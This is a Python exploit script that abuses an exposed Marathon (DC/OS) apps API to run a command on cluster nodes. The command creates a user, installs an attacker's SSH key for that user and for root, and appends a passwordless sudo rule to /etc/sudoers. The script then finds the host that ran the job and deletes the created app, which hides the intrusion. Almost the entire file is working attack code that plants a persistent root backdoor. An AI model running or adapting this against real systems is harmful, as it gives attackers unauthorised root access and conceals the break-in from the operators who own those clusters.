exploitation.py

import sys
import requests
import time
import json
import queue
import configparser

config = configparser.ConfigParser()
config.read('conf.ini')

# Get public SSH key
ssh_pub = config.get('exploit', 'ssh_pub')

q = queue.Queue()


'''
Execute process in Marathon to create user in node
'''
def postExploit(url):
    urlexploit = url + "/service/marathon/v2/apps"
    id = "test" + str(int(time.time()))
    sudoers = '\\"test ALL=(ALL) NOPASSWD:ALL\\"'
    data = '{"cmd":"/usr/sbin/useradd test && mkdir -p /home/test/.ssh && echo -n ' + ssh_pub + ' > /home/test/.ssh/authorized_keys && echo -n ' + ssh_pub + ' >> /root/.ssh/authorized_keys && echo ' + sudoers + ' >> /etc/sudoers && sleep 1000","cpus":1,"mem":128,"disk":0,"instances":1,"id":"' + id + '"}'
    host = None

    try:
        print("Trying to inject exploit in URL {}".format(urlexploit))
        req = requests.post(urlexploit, timeout=10, data=data, verify=False)
        if req.status_code == 201:
            print("Successful exploitation in URL {}\nCreated app with id {}".format(url, id))
            urlget = urlexploit + "/" + id
            time.sleep(10)
            req2 = requests.get(urlget, timeout=5, verify=False)
            if req2.status_code == 200:
                reqjq = json.loads(req2.text)
                host = reqjq['app']['tasks'][0]['host']
                q.put(id)

        else:
            print("\nError! Cannot inject exploit in URL {} due to HTTP error {}".format(url, req.status_code))
            sys.exit(1)

        return host

    except (requests.ConnectTimeout, requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e:
        print("\nError! Cannot inject exploit in URL {} due to:\n{}".format(url, e))


'''
Function to delete process created in Marathon
'''
def delExploit(url, id):
    urldel = url + "/service/marathon/v2/apps" + "/" + id

    try:
        print("Trying to delete service with ID {}".format(id))
        req = requests.delete(urldel, timeout=10, verify=False)
        if req.status_code == 200:
            print("Successful deletion in URL {}\nDeleted service with id {}".format(url, id))
    except (requests.ConnectTimeout, requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e:
        print("\nError! Cannot inject exploit in URL {} due to:\n{}".format(url, e))


def exploit(url):
    host = postExploit(url)
    print("Sleeping 5 seconds while job is being done...")
    time.sleep(5)
    print(q.qsize())
    if q.qsize() > 0:
        id = q.get()
    else:
        print("Error! Cannot delete app. Exiting...")
        sys.exit(1)
    delExploit(url, id)

    return host